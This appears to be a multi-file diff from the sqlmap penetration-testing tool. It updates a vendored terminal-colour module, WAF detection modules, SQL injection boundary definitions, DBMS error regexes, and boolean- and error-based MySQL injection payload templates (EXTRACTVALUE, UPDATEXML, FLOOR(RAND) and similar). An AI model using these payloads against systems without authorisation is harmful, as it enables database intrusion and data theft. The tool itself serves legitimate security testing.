# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
from . import win32
|
||||
|
||||
|
||||
|
@ -15,9 +15,9 @@ class WinColor(object):
|
|||
|
||||
# from wincon.h
|
||||
class WinStyle(object):
|
||||
NORMAL = 0x00 # dim text, dim background
|
||||
BRIGHT = 0x08 # bright text, dim background
|
||||
|
||||
NORMAL = 0x00 # dim text, dim background
|
||||
BRIGHT = 0x08 # bright text, dim background
|
||||
BRIGHT_BACKGROUND = 0x80 # dim text, bright background
|
||||
|
||||
class WinTerm(object):
|
||||
|
||||
|
@ -27,29 +27,44 @@ class WinTerm(object):
|
|||
self._default_fore = self._fore
|
||||
self._default_back = self._back
|
||||
self._default_style = self._style
|
||||
# In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.
|
||||
# So that LIGHT_EX colors and BRIGHT style do not clobber each other,
|
||||
# we track them separately, since LIGHT_EX is overwritten by Fore/Back
|
||||
# and BRIGHT is overwritten by Style codes.
|
||||
self._light = 0
|
||||
|
||||
def get_attrs(self):
|
||||
return self._fore + self._back * 16 + self._style
|
||||
return self._fore + self._back * 16 + (self._style | self._light)
|
||||
|
||||
def set_attrs(self, value):
|
||||
self._fore = value & 7
|
||||
self._back = (value >> 4) & 7
|
||||
self._style = value & WinStyle.BRIGHT
|
||||
self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)
|
||||
|
||||
def reset_all(self, on_stderr=None):
|
||||
self.set_attrs(self._default)
|
||||
self.set_console(attrs=self._default)
|
||||
|
||||
def fore(self, fore=None, on_stderr=False):
|
||||
def fore(self, fore=None, light=False, on_stderr=False):
|
||||
if fore is None:
|
||||
fore = self._default_fore
|
||||
self._fore = fore
|
||||
# Emulate LIGHT_EX with BRIGHT Style
|
||||
if light:
|
||||
self._light |= WinStyle.BRIGHT
|
||||
else:
|
||||
self._light &= ~WinStyle.BRIGHT
|
||||
self.set_console(on_stderr=on_stderr)
|
||||
|
||||
def back(self, back=None, on_stderr=False):
|
||||
def back(self, back=None, light=False, on_stderr=False):
|
||||
if back is None:
|
||||
back = self._default_back
|
||||
self._back = back
|
||||
# Emulate LIGHT_EX with BRIGHT_BACKGROUND Style
|
||||
if light:
|
||||
self._light |= WinStyle.BRIGHT_BACKGROUND
|
||||
else:
|
||||
self._light &= ~WinStyle.BRIGHT_BACKGROUND
|
||||
self.set_console(on_stderr=on_stderr)
|
||||
|
||||
def style(self, style=None, on_stderr=False):
|
||||
|
@ -76,45 +91,72 @@ class WinTerm(object):
|
|||
|
||||
def set_cursor_position(self, position=None, on_stderr=False):
|
||||
if position is None:
|
||||
#I'm not currently tracking the position, so there is no default.
|
||||
#position = self.get_position()
|
||||
# I'm not currently tracking the position, so there is no default.
|
||||
# position = self.get_position()
|
||||
return
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
win32.SetConsoleCursorPosition(handle, position)
|
||||
|
||||
def cursor_up(self, num_rows=0, on_stderr=False):
|
||||
if num_rows == 0:
|
||||
return
|
||||
def cursor_adjust(self, x, y, on_stderr=False):
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
position = self.get_position(handle)
|
||||
adjusted_position = (position.Y - num_rows, position.X)
|
||||
self.set_cursor_position(adjusted_position, on_stderr)
|
||||
adjusted_position = (position.Y + y, position.X + x)
|
||||
win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)
|
||||
|
||||
def erase_data(self, mode=0, on_stderr=False):
|
||||
# 0 (or None) should clear from the cursor to the end of the screen.
|
||||
def erase_screen(self, mode=0, on_stderr=False):
|
||||
# 0 should clear from the cursor to the end of the screen.
|
||||
# 1 should clear from the cursor to the beginning of the screen.
|
||||
# 2 should clear the entire screen. (And maybe move cursor to (1,1)?)
|
||||
#
|
||||
# At the moment, I only support mode 2. From looking at the API, it
|
||||
# should be possible to calculate a different number of bytes to clear,
|
||||
# and to do so relative to the cursor position.
|
||||
if mode[0] not in (2,):
|
||||
return
|
||||
# 2 should clear the entire screen, and move cursor to (1,1)
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
# here's where we'll home the cursor
|
||||
coord_screen = win32.COORD(0,0)
|
||||
csbi = win32.GetConsoleScreenBufferInfo(handle)
|
||||
# get the number of character cells in the current buffer
|
||||
dw_con_size = csbi.dwSize.X * csbi.dwSize.Y
|
||||
cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y
|
||||
# get number of character cells before current cursor position
|
||||
cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X
|
||||
if mode == 0:
|
||||
from_coord = csbi.dwCursorPosition
|
||||
cells_to_erase = cells_in_screen - cells_before_cursor
|
||||
if mode == 1:
|
||||
from_coord = win32.COORD(0, 0)
|
||||
cells_to_erase = cells_before_cursor
|
||||
elif mode == 2:
|
||||
from_coord = win32.COORD(0, 0)
|
||||
cells_to_erase = cells_in_screen
|
||||
# fill the entire screen with blanks
|
||||
win32.FillConsoleOutputCharacter(handle, ord(' '), dw_con_size, coord_screen)
|
||||
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
|
||||
# now set the buffer's attributes accordingly
|
||||
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), dw_con_size, coord_screen );
|
||||
# put the cursor at (0, 0)
|
||||
win32.SetConsoleCursorPosition(handle, (coord_screen.X, coord_screen.Y))
|
||||
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
|
||||
if mode == 2:
|
||||
# put the cursor where needed
|
||||
win32.SetConsoleCursorPosition(handle, (1, 1))
|
||||
|
||||
def erase_line(self, mode=0, on_stderr=False):
|
||||
# 0 should clear from the cursor to the end of the line.
|
||||
# 1 should clear from the cursor to the beginning of the line.
|
||||
# 2 should clear the entire line.
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
csbi = win32.GetConsoleScreenBufferInfo(handle)
|
||||
if mode == 0:
|
||||
from_coord = csbi.dwCursorPosition
|
||||
cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X
|
||||
if mode == 1:
|
||||
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
|
||||
cells_to_erase = csbi.dwCursorPosition.X
|
||||
elif mode == 2:
|
||||
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
|
||||
cells_to_erase = csbi.dwSize.X
|
||||
# fill the entire screen with blanks
|
||||
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
|
||||
# now set the buffer's attributes accordingly
|
||||
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
|
||||
|
||||
def set_title(self, title):
|
||||
win32.SetConsoleTitle(title)
|
||||
|
|
9
thirdparty/pagerank/pagerank.py
vendored
9
thirdparty/pagerank/pagerank.py
vendored
|
@ -14,14 +14,15 @@
|
|||
|
||||
import sys
|
||||
import urllib
|
||||
import urllib2
|
||||
|
||||
def get_pagerank(url):
|
||||
def get_pagerank(url, timeout=10):
|
||||
url = url.encode('utf8') if isinstance(url, unicode) else url
|
||||
_ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url))
|
||||
try:
|
||||
f = urllib.urlopen(_)
|
||||
rank = f.read().strip()[9:]
|
||||
except Exception:
|
||||
req = urllib2.Request(_)
|
||||
rank = urllib2.urlopen(req, timeout=timeout).read().strip()[9:]
|
||||
except:
|
||||
rank = 'N/A'
|
||||
else:
|
||||
rank = '0' if not rank or not rank.isdigit() else rank
|
||||
|
|
|
@ -18,7 +18,7 @@ def detect(get_page):
|
|||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
retval = re.search(r"fhl", headers.get("X-Server", ""), re.I) is not None
|
||||
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER), re.I) is not None
|
||||
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
|
24
waf/nsfocus.py
Normal file
24
waf/nsfocus.py
Normal file
|
@ -0,0 +1,24 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
|
||||
from lib.core.enums import HTTP_HEADER
|
||||
from lib.core.settings import WAF_ATTACK_VECTORS
|
||||
|
||||
__product__ = "NSFOCUS Web Application Firewall (NSFOCUS)"
|
||||
|
||||
def detect(get_page):
|
||||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
retval = re.search(r"NSFocus", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
if retval:
|
||||
break
|
||||
|
||||
return retval
|
|
@ -16,8 +16,9 @@ def detect(get_page):
|
|||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
page, headers, code = get_page(get=vector)
|
||||
retval = re.search(r"Rejected-By-UrlScan", headers.get(HTTP_HEADER.LOCATION, ""), re.I) is not None
|
||||
retval |= code != 200 and re.search(r"/Rejected-By-UrlScan", page or "", re.I) is not None
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
|
|
@ -31,6 +31,7 @@ Tag: <boundary>
|
|||
6: TOP
|
||||
7: Table name
|
||||
8: Column name
|
||||
9: Pre-WHERE (non-query)
|
||||
|
||||
A comma separated list of these values is also possible.
|
||||
|
||||
|
@ -80,7 +81,7 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix>)</prefix>
|
||||
<suffix></suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
|
@ -89,7 +90,7 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>')</prefix>
|
||||
<suffix></suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
|
@ -98,7 +99,7 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>'</prefix>
|
||||
<suffix></suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
|
@ -107,7 +108,7 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>4</ptype>
|
||||
<prefix>"</prefix>
|
||||
<suffix></suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
<!-- End of generic boundaries -->
|
||||
|
||||
|
@ -406,7 +407,7 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix></prefix>
|
||||
<suffix>-- [RANDSTR]</suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
|
@ -422,56 +423,92 @@ Formats:
|
|||
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<clause>9</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<clause>9</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<clause>9</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<clause>9</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<clause>9</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>4</ptype>
|
||||
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<clause>9</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>9</clause>
|
||||
<where>1</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>)||'</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>9</clause>
|
||||
<where>1</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>)||'</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>9</clause>
|
||||
<where>1</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>)+'</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>9</clause>
|
||||
<where>1</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>)+'</suffix>
|
||||
</boundary>
|
||||
<!-- End of pre-WHERE generic boundaries -->
|
||||
|
||||
|
@ -482,7 +519,7 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
|
@ -491,7 +528,7 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
|
@ -500,7 +537,7 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
|
@ -509,7 +546,7 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
|
@ -518,7 +555,7 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>4</ptype>
|
||||
<prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
|
@ -527,27 +564,16 @@ Formats:
|
|||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>-- </suffix>
|
||||
</boundary>
|
||||
<!-- End of pre-WHERE derived table boundaries -->
|
||||
|
||||
<!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>)||'</suffix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>)||'</suffix>
|
||||
<ptype>1</ptype>
|
||||
<prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
|
@ -555,19 +581,10 @@ Formats:
|
|||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>)+'</suffix>
|
||||
<prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>[GENERIC_SQL_COMMENT]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||
<suffix>)+'</suffix>
|
||||
</boundary>
|
||||
<!-- End of INSERT/UPDATE generic boundaries -->
|
||||
<!-- End of pre-WHERE derived table boundaries -->
|
||||
|
||||
<!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
|
||||
<boundary>
|
||||
|
|
|
@ -7,6 +7,7 @@
|
|||
<error regexp="Warning.*mysql_.*"/>
|
||||
<error regexp="MySqlException \(0x"/>
|
||||
<error regexp="valid MySQL result"/>
|
||||
<error regexp="check the manual that corresponds to your MySQL server version"/>
|
||||
<error regexp="MySqlClient\."/>
|
||||
<error regexp="com\.mysql\.jdbc\.exceptions"/>
|
||||
</dbms>
|
||||
|
@ -31,6 +32,7 @@
|
|||
<error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/>
|
||||
<error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/>
|
||||
<error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
|
||||
<error regexp="Microsoft SQL Native Client.*[0-9a-fA-F]{8}"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Microsoft Access -->
|
||||
|
@ -43,7 +45,7 @@
|
|||
|
||||
<!-- Oracle -->
|
||||
<dbms value="Oracle">
|
||||
<error regexp="\bORA-[0-9][0-9][0-9][0-9]"/>
|
||||
<error regexp="\bORA-\d{5}"/>
|
||||
<error regexp="Oracle error"/>
|
||||
<error regexp="Oracle.*Driver"/>
|
||||
<error regexp="Warning.*\Woci_.*"/>
|
||||
|
@ -55,7 +57,7 @@
|
|||
<error regexp="CLI Driver.*DB2"/>
|
||||
<error regexp="DB2 SQL error"/>
|
||||
<error regexp="\bdb2_\w+\("/>
|
||||
<error regexp="(?i)SQLSTATE.+SQLCODE"/>
|
||||
<error regexp="SQLSTATE.+SQLCODE"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Informix -->
|
||||
|
@ -87,9 +89,11 @@
|
|||
|
||||
<!-- Sybase -->
|
||||
<dbms value="Sybase">
|
||||
<error regexp="(?i)Warning.*sybase.*"/>
|
||||
<error regexp="Warning.*sybase.*"/>
|
||||
<error regexp="Sybase message"/>
|
||||
<error regexp="Sybase.*Server message.*"/>
|
||||
<error regexp="SybSQLException"/>
|
||||
<error regexp="com\.sybase\.jdbc"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Ingres -->
|
||||
|
|
|
@ -53,6 +53,7 @@ Tag: <test>
|
|||
6: TOP
|
||||
7: Table name
|
||||
8: Column name
|
||||
9: Pre-WHERE (non-query)
|
||||
|
||||
A comma separated list of these values is also possible.
|
||||
|
||||
|
@ -159,7 +160,7 @@ Tag: <test>
|
|||
<stype>1</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [INFERENCE]</vector>
|
||||
<request>
|
||||
|
@ -175,7 +176,7 @@ Tag: <test>
|
|||
<stype>1</stype>
|
||||
<level>1</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [INFERENCE]</vector>
|
||||
<request>
|
||||
|
@ -191,7 +192,7 @@ Tag: <test>
|
|||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR NOT [INFERENCE]</vector>
|
||||
<request>
|
||||
|
@ -212,7 +213,7 @@ Tag: <test>
|
|||
<vector>AND [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
|
||||
|
@ -229,7 +230,7 @@ Tag: <test>
|
|||
<vector>OR [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=[RANDNUM]</payload>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
|
||||
|
@ -246,7 +247,7 @@ Tag: <test>
|
|||
<vector>OR NOT [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
|
||||
<request>
|
||||
|
@ -31,7 +31,7 @@
|
|||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
|
||||
<where>1</where>
|
||||
<vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
|
||||
|
@ -56,7 +56,7 @@
|
|||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
|
@ -80,7 +80,7 @@
|
|||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
|
||||
<where>1</where>
|
||||
<vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
|
||||
|
@ -105,7 +105,7 @@
|
|||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
|
||||
<request>
|
||||
|
@ -129,7 +129,7 @@
|
|||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
|
||||
<where>1</where>
|
||||
<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
|
||||
|
@ -154,7 +154,7 @@
|
|||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
|
||||
<request>
|
||||
|
@ -174,7 +174,7 @@
|
|||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
|
||||
<request>
|
||||
|
@ -194,7 +194,7 @@
|
|||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
|
@ -219,7 +219,7 @@
|
|||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
|
@ -243,7 +243,7 @@
|
|||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
|
||||
<request>
|
||||
|
@ -268,7 +268,7 @@
|
|||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
|
||||
<request>
|
||||
|
@ -293,7 +293,7 @@
